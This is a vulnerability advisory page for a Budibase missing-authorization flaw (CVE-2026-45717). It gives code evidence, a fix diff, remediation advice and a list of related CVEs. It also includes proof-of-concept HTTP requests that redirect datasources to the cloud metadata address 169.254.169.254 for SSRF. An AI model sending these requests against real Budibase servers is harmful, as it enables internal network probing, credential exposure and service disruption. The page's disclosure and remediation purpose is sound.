Skip to main content

Budibase EUVDEUVD-2026-32601

| CVE-2026-45717 HIGH
Missing Authorization (CWE-862)
2026-05-15 https://github.com/Budibase/budibase GHSA-44m2-crh7-f4q2
8.8
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.8 HIGH
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

2
Source Code Evidence Fetched
May 15, 2026 - 18:30 vuln.today
Analysis Generated
May 15, 2026 - 18:30 vuln.today

DescriptionGitHub Advisory

Summary

Budibase exposes a REST API for datasource management. The route PUT /api/datasources/:datasourceId is registered in the authorizedRoutes group with TABLE/READ permission. This is the same authorization level as the read endpoint (GET /api/datasources/:datasourceId). Every authenticated Budibase app user with the BASIC built-in role or higher carries TABLE/WRITE (and therefore TABLE/READ) permissions, and the datasource update controller performs no additional builder check.

As a result, any authenticated non-builder app user can submit a PUT request to rewrite a datasource's config object - including the connection host, port, database credentials, or the base url of a REST datasource. Because no network-level SSRF protection is applied to SQL driver connections, redirecting a PostgreSQL/MySQL/MongoDB datasource to an internal IP address succeeds and the attacker can probe or interact with internal services on arbitrary ports.

Code evidence

Route registration - wrong authorization group

packages/server/src/api/routes/datasource.ts, line 35-37
typescript
authorizedRoutes
  .get("/api/datasources/:datasourceId", datasourceController.find)
  .put("/api/datasources/:datasourceId", datasourceController.update)   // <-- should be builderRoutes

All destructive (create/delete/verify) operations are gated behind builderRoutes:

typescript
builderRoutes
  .get("/api/datasources", datasourceController.fetch)
  .post("/api/datasources/verify", datasourceController.verify)
  .post("/api/datasources", datasourceValidator(), datasourceController.save)
  .delete("/api/datasources/:datasourceId/:revId", datasourceController.destroy)

The update route shares the same authorization group as the read route, not the builder group.

Authorization middleware allows BASIC-role users

packages/server/src/middleware/authorized.ts, lines 46-50
packages/backend-core/src/security/permissions.ts, lines 82-90
packages/backend-core/src/security/roles.ts, lines 162-169

authorizedRoutes is defined with authorized(PermissionType.TABLE, PermissionLevel.READ).

When doesHaveBasePermission(TABLE, READ, rolesHierarchy) is evaluated for a BASIC-role user:

  • BASIC role → BuiltinPermissionID.WRITE
  • WRITE permission includes PermissionImpl(PermissionType.TABLE, PermissionLevel.WRITE)
  • getAllowedLevels(WRITE) returns [WRITE, READ]
  • Therefore TABLE/READ is satisfied → user is authorized

BASIC is the lowest non-public authenticated built-in role. Any end-user account added to a Budibase app will be assigned at minimum the BASIC role.

Controller performs no additional builder check

packages/server/src/api/controllers/datasource.ts, lines 207-255
typescript
export async function update(ctx) {
  const db = context.getWorkspaceDB()
  const datasourceId = ctx.params.datasourceId
  const baseDatasource = await sdk.datasources.get(datasourceId)  // no builder guard
  await invalidateVariables(baseDatasource, ctx.request.body)

  const dataSourceBody: Datasource = isBudibaseSource
    ? { name: ..., type: ..., source: SourceName.BUDIBASE }
    : ctx.request.body                                              // attacker-controlled config

  let datasource: Datasource = {
    ...baseDatasource,
    ...sdk.datasources.mergeConfigs(dataSourceBody, baseDatasource),  // merges attacker config
  }

  const response = await db.put(sdk.tables.populateExternalTableSchemas(datasource))  // persisted
  ...
}

mergeConfigs does not protect non-password connection fields

packages/server/src/sdk/workspace/datasources/datasources.ts, lines 278-316

mergeConfigs only replaces PASSWORD_REPLACEMENT sentinel values back to the stored secret. Fields like host, port, database, url, ssl are taken from the update payload without restriction:

typescript
// update back to actual passwords for everything else
for (let [key, value] of Object.entries(update.config)) {
  if (value !== PASSWORD_REPLACEMENT) {
    continue          // non-password fields pass through unchanged
  }
  ...
}

Attack scenarios

Scenario 1: SSRF via SQL driver connection redirection

  1. Attacker is a BASIC-role user of a Budibase app that has a PostgreSQL (or MySQL/MongoDB) datasource.
  2. Attacker sends:
http
   PUT /api/datasources/<datasource_id> HTTP/1.1
   Host: target
   Authorization: Bearer <app-user-token>
   Content-Type: application/json

   {
     "config": {
       "host": "169.254.169.254",
       "port": 5432,
       "database": "postgres",
       "user": "postgres",
       "password": "PASSWORD_REPLACEMENT"
     }
   }
  1. Datasource config is persisted with host: 169.254.169.254.
  2. Any subsequent query execution against this datasource (POST /api/queries/execute) causes Budibase's PostgreSQL driver to open a TCP connection to 169.254.169.254:5432 on the internal network.
  3. Unlike REST connector SSRF (which has an IP deny list), SQL driver connections are made at the OS network level without HTTP-layer filtering, bypassing the existing SSRF mitigation introduced for REST connectors.

Scenario 2: SSRF via REST datasource URL change

  1. Same setup with a REST datasource.
  2. Attacker sends:
http
   PUT /api/datasources/<datasource_id> HTTP/1.1
   ...
   {
     "config": {
       "url": "http://169.254.169.254/latest/meta-data/"
     }
   }
  1. If the IMPORT_IP_DENY_LIST equivalent for Budibase's REST connector is not configured, the fetch proceeds and the response is visible in query results.
  2. Even with IP restrictions on the REST connector, the attacker can point the URL to any public-facing internal service (e.g., a staging server, internal API).

Scenario 3: Datasource disruption / DoS

An attacker with BASIC permissions can overwrite the datasource config with garbage values, breaking all application queries that depend on that datasource for all users of the app.

Minimal PoC shape

http
PUT /api/datasources/<target_datasource_id> HTTP/1.1
Host: <budibase-host>
Authorization: Bearer <basic-user-access-token>
Content-Type: application/json

{
  "name": "Modified",
  "source": "POSTGRES",
  "type": "datasource",
  "config": {
    "host": "169.254.169.254",
    "port": 5432,
    "database": "postgres",
    "user": "postgres",
    "password": "PASSWORD_REPLACEMENT",
    "ssl": false
  }
}

Expected secure behavior:

  • Return 403 Forbidden - only builder/admin users should be allowed to update datasource configurations.

Observed source behavior:

  • Config is persisted to CouchDB and all future queries against the datasource use the attacker-supplied connection parameters.

Impact

DimensionAssessment
Privileges requiredAuthenticated BASIC-role app user (lowest non-public role)
User interactionNone
ConfidentialityHigh - SSRF to cloud metadata or internal services
IntegrityHigh - overwrites datasource used by all app users
AvailabilityHigh - can break all queries by injecting invalid config

Initial severity estimate: High (CVSS ~8.1)

Why this is distinct from known CVEs

CVE / GHSARoot causeDifferent because
CVE-2026-31818 (SSRF in REST connector)IMPORT_IP_DENY_LIST not set by defaultThat fixed HTTP-level filter; SQL driver connections bypass HTTP-layer protection entirely
GHSA-2g39-332f-68p9 (RBAC privilege escalation)Creator role could create Admin rolesDifferent mechanism - role creation, not route auth bypass
GHSA-gw94-hprh-4wj8 (Universal auth bypass)?/webhooks/trigger param bypassed authCompletely different attack primitive
GHSA-726g-59wr-cj4c (PostgreSQL dump command injection)Unsanitized connection params in backup pathDifferent vector - this is write access to live connection config

The root cause here is a route-level authorization misconfiguration: PUT /api/datasources/:id is registered in the wrong endpoint group (authorizedRoutes vs builderRoutes).

Fix direction

Move the PUT /api/datasources/:datasourceId route from authorizedRoutes to builderRoutes:

diff
- authorizedRoutes
-   .get("/api/datasources/:datasourceId", datasourceController.find)
-   .put("/api/datasources/:datasourceId", datasourceController.update)

+ authorizedRoutes
+   .get("/api/datasources/:datasourceId", datasourceController.find)

+ builderRoutes
+   .put("/api/datasources/:datasourceId", datasourceController.update)

Submission note

Current state: source-confirmed candidate. Runtime reproduction (HTTP request against live Budibase instance) has not been executed in this session. Budibase has an active GHSA process - security reports via GitHub Security Advisories should receive triage within days based on historical pattern.

AnalysisAI

Budibase servers before version 3.38.1 allow any authenticated application user to modify datasource connection parameters through the REST API endpoint PUT /api/datasources/:datasourceId, which requires only basic TABLE/READ permissions instead of builder-level access. This authorization bypass enables attackers with minimal BASIC role privileges to redirect PostgreSQL, MySQL, MongoDB, or REST datasources to arbitrary hosts and ports, creating server-side request forgery (SSRF) conditions that bypass existing HTTP-layer protections for SQL driver connections. The vulnerability has been assigned CVSS 8.8 (High) and is fixed in Budibase 3.38.1.

Technical ContextAI

The vulnerability stems from incorrect route registration in packages/server/src/api/routes/datasource.ts where the datasource update endpoint is placed in the authorizedRoutes group with TABLE/READ permission level rather than the builderRoutes group used for other destructive operations. Budibase's role-based access control automatically grants TABLE/READ permissions to all authenticated users with BASIC role or higher through the permission hierarchy system. The datasource controller's update function performs no additional authorization checks beyond the route-level middleware, allowing the mergeConfigs function to accept attacker-controlled connection parameters including host, port, database, and URL fields while only protecting password fields marked with PASSWORD_REPLACEMENT sentinel values.

RemediationAI

Upgrade to Budibase version 3.38.1 or later, which moves the datasource update route to proper builder-level authorization as confirmed in the release notes mentioning '[Security] Require builder access for datasource updates'. The fix is available at https://github.com/Budibase/budibase/releases/tag/3.38.1. If immediate patching is not possible, restrict application user registration to trusted individuals only and audit existing BASIC role assignments, though this provides limited protection since any authenticated user can exploit the vulnerability. Consider implementing network segmentation to limit potential SSRF targets from the Budibase server, particularly blocking access to cloud metadata endpoints and sensitive internal services.

CVE-2025-1094 HIGH POC
8.1 Feb 13

PostgreSQL libpq functions PQescapeLiteral(), PQescapeIdentifier(), PQescapeString(), and PQescapeStringConn() improperl

CVE-2024-55964 CRITICAL POC
9.8 Mar 26

An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl

CVE-2013-1899 MEDIUM POC
6.5 Apr 04

Argument injection vulnerability in PostgreSQL 9.2.x before 9.2.4, 9.1.x before 9.1.9, and 9.0.x before 9.0.13 allows re

CVE-2026-20253 CRITICAL POC
9.8 Jun 10

Unauthenticated arbitrary file write in Splunk Enterprise (below 10.2.4 and 10.0.7) and Splunk Cloud Platform (below 10.

CVE-2017-7546 CRITICAL
9.8 Aug 16

PostgreSQL versions before 9.2.22, 9.3.18, 9.4.13, 9.5.8 and 9.6.4 are vulnerable to incorrect authentication flaw allow

CVE-2015-1352 MEDIUM POC
5.0 Mar 30

The build_tablename function in pgsql.c in the PostgreSQL (aka pgsql) extension in PHP through 5.6.7 does not validate t

CVE-2024-10553 CRITICAL POC
9.8 Mar 20

A vulnerability in the h2oai/h2o-3 REST API versions 3.46.0.4 allows unauthenticated remote attackers to execute arbitra

CVE-2019-9193 HIGH POC
7.2 Apr 01

In PostgreSQL 9.3 through 11.2, the "COPY TO/FROM PROGRAM" function allows superusers and users in the 'pg_execute_serve

CVE-2026-40887 CRITICAL POC
9.1 Apr 14

## Summary An unauthenticated SQL injection vulnerability exists in the Vendure Shop API. A user-controlled query strin

CVE-2022-24760 CRITICAL POC
10.0 Mar 12

Parse Server is an open source http web server backend. Rated critical severity (CVSS 10.0), this vulnerability is remot

CVE-2025-56157 CRITICAL POC
9.8 Dec 18

Hard-coded default PostgreSQL credentials shipped in the docker-compose.yaml of langgenius Dify through version 1.5.1 al

CVE-2024-12909 CRITICAL POC
9.8 Mar 20

A vulnerability in the FinanceChatLlamaPack of the run-llama/llama_index repository, versions up to v0.12.3, allows for

Share

EUVD-2026-32601 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy